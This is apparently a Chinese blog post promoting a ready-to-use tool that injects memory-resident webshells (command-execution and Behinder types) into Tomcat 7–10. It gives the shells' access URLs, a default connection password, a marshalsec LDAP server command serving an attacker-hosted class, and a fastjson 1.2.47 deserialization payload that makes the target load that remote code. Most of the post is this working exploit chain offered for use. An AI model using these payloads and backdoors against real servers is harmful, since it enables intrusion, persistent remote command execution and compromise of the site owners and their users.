一、工具简介
拿来即用的Tomcat7/8/9/10版本Listener/Filter/Servlet内存马,支持注入CMD内存马和冰蝎内存马。
二、使用方法
1、Listener型/Filter型:
CMD内存马URL:xx.xx.xx.xx/?chan=whoami
冰蝎内存马URL:xx.xx.xx.xx/ 默认连接密码:goautomne
2、Servlet型:
CMD内存马URL: xx.xx.xx.xx/p?chan=whoami
冰蝎内存马URL: xx.xx.xx.xx/p 默认连接密码:goautomne
三、利用举例
以fastjson1.2.47版本的反序列化漏洞为例,将对应Tomcat版本的class文件,这里以ILRain.class为例,上传到web服务器,并开启LDAP服务
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://xx.xx.xx.xx/#ILRain 9102
然后再打入fastjson漏洞的poc,就可以使用冰蝎客户端去连接了
{
"a":{
"@type":"java.lang.Class",
"val":"com.sun.rowset.JdbcRowSetImpl"
},
"b":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"ldap://xx.xx.xx.xx:9102/123",
"autoCommit":true
}
}
四、项目地址
https://github.com/ce-automne/TomcatMemShell
标签:渗透,com,CMD,URL,xx,内存,上手,冰蝎 From: https://www.cnblogs.com/o-O-oO/p/18638018原创 系统安全运维